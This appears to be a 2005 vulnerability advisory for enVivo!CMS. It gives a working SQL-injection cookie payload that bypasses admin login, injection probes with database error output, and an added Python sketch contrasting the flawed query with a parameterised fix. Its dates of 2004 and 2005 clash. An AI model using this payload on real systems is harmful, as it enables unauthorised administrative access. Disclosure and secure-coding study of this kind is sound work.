HSC Research Group - Advisories
Written by Hackers Center
Friday, 29 April 2005 08:40
Dcrab's Security Advisory [Hsc Security Group] http://www.hackerscenter.com/ [dP Security] http://digitalparadox.org/
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. Learn more at http://www.digitalparadox.org/services.ah
Severity: High
Title: Authentication Bypass and Multiple SQL Injections in enVivo!CMS
Date: 29/04/2004
Vendor: EnvivoSoft
Vendor Website: http://www.envivosoft.com/
Vendor Status: Vendor was notified but with no response yet.
Summary: enVivo!CMS contains an authentication bypass and multiple SQL injection vulnerabilities.
Proof of Concept Exploits:
http://localhost/envivo101/envivocms/admin_login.asp
AUTHENTICATION BYPASS
By setting both the cookie username and password values to a' or 'a' = 'a you can get access to the administrative account. For example:
Cookie name: 101
Cookie value: remStayLoggedIn=True&remPassword=a%27+or+%27a%27+%3D+%27a&remUserName=a%27+or+%27a%27+%3D+%27a
Result: Hello enVivo!CMS Classic Administrator (admin) - Content Awaiting Approval
The "stay logged in" check in the product's ASP, which passes the three cookie values straight to the login function:
[CODE]
' The cookie values are read and handed to the login check unmodified
If Xe5c10c3X(Request.Cookies(CStr(INSTANCE_ID))("remUserName"), Request.Cookies(CStr(INSTANCE_ID))("remPassword"), Request.Cookies(CStr(INSTANCE_ID))("remStayLoggedIn")) Then X4047377X = True
[/CODE]
http://localhost/envivo101/envivocms/admin_login.asp
SQL INJECTION
By setting the Username field to 'SQL_INJECTION you get:
Microsoft JET Database Engine error '80040e14'
Syntax error (missing operator) in query expression 'username = ''' AND pword = 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855''.
/envivo101/envivocms/envivoadminAPI.asp, line 3077
http://localhost/envivo101/default.asp?action=search&searchstring='SQL_INJECTION
SQL INJECTION
Microsoft JET Database Engine error '80040e14'
Syntax error (missing operator) in query expression '((articlespub.title LIKE '%'SQL_INJECTION%' OR articlespub.abstract LIKE '%'SQL_INJECTION%' OR articlespub.article LIKE '%'SQL_INJECTION%')) AND articlespub.releasetoweb = 1 AND DATE() BETWEEN articlespub.startdate AND articlespub.enddate'.
/envivo101/envivocms/envivodisplayAPIfunctions.asp, line 788
http://localhost/envivo101/default.asp?action=category&ID='SQL_ERROR
Microsoft VBScript runtime error '800a000d'
Type mismatch: 'CLng'
/envivo101/envivocms/envivodisplayAPIfunctions.asp, line 42
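As an added, defender-side illustration (not code from the advisory or from EnvivoSoft), the following Python models the remembered-login check that the bypass above abuses: the cookie values concatenated into a WHERE clause of the shape visible in the JET error message, beside the same check with bound parameters. SQLite stands in for the JET backend, and the user table, the stored hash and the password are constructed; the assumption is that the remembered-login path compares the cookie value directly against the stored password hash.

```python
import hashlib
import sqlite3

# The cookie value from the advisory, URL-decoded
PAYLOAD = "a' or 'a' = 'a"
ADMIN_HASH = hashlib.sha256(b"constructed-admin-password").hexdigest()


def make_db():
    """Constructed stand-in for the CMS user table (the real product uses JET)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, pword TEXT)")
    db.execute("INSERT INTO users VALUES (?, ?)", ("admin", ADMIN_HASH))
    return db


def cookie_login_vulnerable(db, rem_user, rem_pword):
    """Assumed shape of the 'stay logged in' check: cookie text is pasted into
    the SQL, so the quotes in PAYLOAD turn the WHERE clause into
    username = 'a' OR ('a' = 'a' AND pword = 'a') OR 'a' = 'a', which is always true."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND pword = '%s'"
           % (rem_user, rem_pword))
    row = db.execute(sql).fetchone()
    return row[0] if row else None


def cookie_login_hardened(db, rem_user, rem_pword):
    """Same check with bound parameters: cookie text is only ever compared as data,
    so the payload is looked up literally and matches no user."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND pword = ?",
        (rem_user, rem_pword),
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run the payload and a genuine cookie through both checks."""
    db = make_db()
    return {
        "vulnerable_payload": cookie_login_vulnerable(db, PAYLOAD, PAYLOAD),
        "hardened_payload": cookie_login_hardened(db, PAYLOAD, PAYLOAD),
        "hardened_valid": cookie_login_hardened(db, "admin", ADMIN_HASH),
    }


if __name__ == "__main__":
    print(demo())
```

The vulnerable check returns "admin" for the payload, while the hardened one returns None for it and still accepts the genuine cookie.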
Keep yourself updated; RSS feed at: http://digitalparadox.org/rss.ah
Author: These vulnerabilities have been found and released by Diabolic Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to contact me regarding these vulnerabilities. You can find me at http://www.hackerscenter.com or http://digitalparadox.org/. Look out for my soon to come out book on Secure coding with php.